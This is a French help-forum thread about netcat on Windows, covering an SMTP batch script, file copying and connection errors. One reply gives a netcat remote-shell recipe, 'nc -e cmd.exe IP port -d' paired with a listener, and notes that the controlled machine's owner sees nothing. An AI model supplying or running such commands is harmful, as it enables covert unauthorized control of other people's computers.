Probleme ave netcat

imad -  
 neo1111 -
salut tout le monde,
j'ai programmé un petit batch qui appelle netcat, et qui lui demande d'executer les commandes presentes sur un fichier texte comme ceci:
nc < log.txt
ces commandes sont censées me connecter à un serveur smtp
ehlo smtp.xxxx.xx 
mail from: xxx@xxxx.com 
rcpt to: xxxx@xxxx.com 
 data >> log.txt
...

le probleme c'est que sur certaines machines, meme si le fichier texte existe, les commandes qu'ils comportent ne s'execute pas! par contre sur mon ordi ça marche bien!(à noter que j'ai la meme configuration que celle des ordi où ca ne marche pas, à savoir win xp sp2) j'ai essayé d'inclure les commande dans le batch mais là aussi ca ne marche pas(en tout cas pas chez moi).
quelqu'un peut il me proposer une solution pour ordonner a netcat d'executer une suite de commande presente dans un fichier texte et qui marcherait sur toutes les machines?
merci

7 réponses

bootdevice

c'est normal que cela ne fonctionne pas.
les commandes que tu veux exécuter ne te connectent pas sur le serveur smtp mais sont seulement des commandes que tu executes dessus.
en lançant ton bat tu transmets ces commandes au poste sur lequel est le bat. tu ne les envois pas sur un serveur distant.
sur le tient si cela fonctionne tu as du alors installé IIS? et lancer le serveur smtp?
0
imad

merci,
si j'ai bien compris, si je veux que ça marche sur les autres machines il faut qu'ils installes IIS! euh... c'est quoi IIS? est ce que je peux l'iclure dans le pack d'installation de mon programme?
0
bartok Messages postés 21 Date d'inscription   Statut Membre Dernière intervention  

non ya rien besoin d'installer

il fo juste que netcat soit present sur les 2 machine

dun coté tu tape ta commande serveur et de lotre la commande hote distant et ensuite la liaison est fiates tout simplement

ex : prendre le controle du dos a distance via netcat

hote local qui veu prendre le controle: doit se mettre en attente de connexion : --> nc -l -p "n° du port"

hoste distant sur lekel on veu prendre le controle: --> nc -e cmd.exe "IP" "N°duport" -d

voila c tout rien de plus simple il fo juste ouvrir le port choisi sur la machien serveur si tuu que la connexion passe

en gros c tout con tres simple et tres efficasse

une foi connecter avec nc sur la machine tu peu y faire ce que tu veu dautant que la personne dont la machine est sous controle ne voi rien sua f leprocessus nc de lancer et la cmd.exe

apres ta le choi scan de port echange tftp exeuction de programme
tu es ds le dos de la machine hote tu y fai ce que tu veu
voila si dotre question sur nc ne pas hesiter
antony_l_77@hotmail.com

++
0
gm__ Messages postés 6 Date d'inscription   Statut Membre Dernière intervention  

Bonjour!

Moi j'ai un problem pour copier d'un PC a l'autre avec netcat.

Une fois connecté je lance cette commande:

copy C:\Documents and Settings\pascal\Desktop\readme.txt |nc
xxx.xxx.x.x 23 (ip et port de l'autre pc)

Et je recois ce message d'erreur:
"the process tried to write to a non-existent pipe."
Qui veut dire en francais qu'il a essayé à écrire a un "pipe" nonexistent.

Où est-ce que je me trompe dans la syntaxe?

Merci pour votre aide!
0
ICONITO

Pouriai vous me donner le script entier silvous plait merci davance
ps : ses pour que je compréne
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
gm__ Messages postés 6 Date d'inscription   Statut Membre Dernière intervention  

Merci pour votre reponse!
Quel script vous parlez?

En fait je me suis rendu compt dupuis que avec netcat c'est pas du tout
pratique de copier.
Parce que il faut faire le command sur les de pc en meme temps
pour pouvoir le faire.
Jai reussi mais jai laissé tombé netcat parce que c'est comme jai dis
pas pratique.
0
neo1111

he evry body , mon problem a moi c que quand je lance nc.exe et que j'ésséye de le connecter a nimporte quelle serveur ca marche pas et je vois le message:NETCAT: forward host lookup failed: h_errno 11001: HOST_NOT_FOUND
0
neo1111

salut tjr le mem problém avec netcat jaryve a me connecter avec aucun serveur avec aucun prot
0